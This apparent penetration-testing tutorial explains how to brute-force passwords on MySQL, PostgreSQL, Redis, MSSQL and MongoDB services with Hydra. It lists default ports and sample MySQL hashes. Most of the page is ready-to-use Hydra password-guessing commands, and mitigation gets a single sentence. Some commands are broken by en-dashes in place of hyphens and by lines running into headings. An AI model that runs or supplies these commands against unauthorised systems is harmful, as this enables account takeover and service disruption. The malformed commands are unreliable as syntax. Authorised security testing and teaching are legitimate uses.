Today in this tutorial we will learn how to brute force Database services passwords, when testing on live environments be cautious or you will trigger a mysql ddos into the service.
Attack and Penetration Testing of Database Services
Brute force databases services can be one of the most simple attacks to do but can have a huge impact on the business. Mitigate this kind of attacks is crucial to any security team when installing a mysql server always keep in mind the best security practices
Mysql Paswords
Mysql password can have different hash types, hydra can detect them automatically, mysql service run on port 3306/TCP.
MySQL Old Hash
Length: 8 bytes
Hash Example: 706317496665abbb
MySql New Hash
Length: 20 bytes
Hash Example: *E6CC90B878B948C3510F5433C792C46C58C4AF40
hydra -L usernames.txt -P pass.txt <IP> mysqlHydra Parameters
- -L -> List of usernames to test
- -P -> Wordlist of passwords to test
- mysql -> define the service type into hydra
PostgresSQL Passwords
Port: 5432/TCP
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgresRedis Passwords
hydra –P /path/pass.txt redis://<IP>:<PORT> MSSQL Passwords
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql-
How to Brute Force MySQL Passwords?
hydra -L usernames.txt -P pass.txt <IP> mysql
-
How to Brute Force MSSQL Passwords?
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
-
How to Brute Force Redis Passwords?
hydra –P /path/pass.txt redis://<IP>:<PORT>
-
How to Brute Force Postgres Passwords?
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
-
How to Brute Force MongoDB Passwords?
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mongodb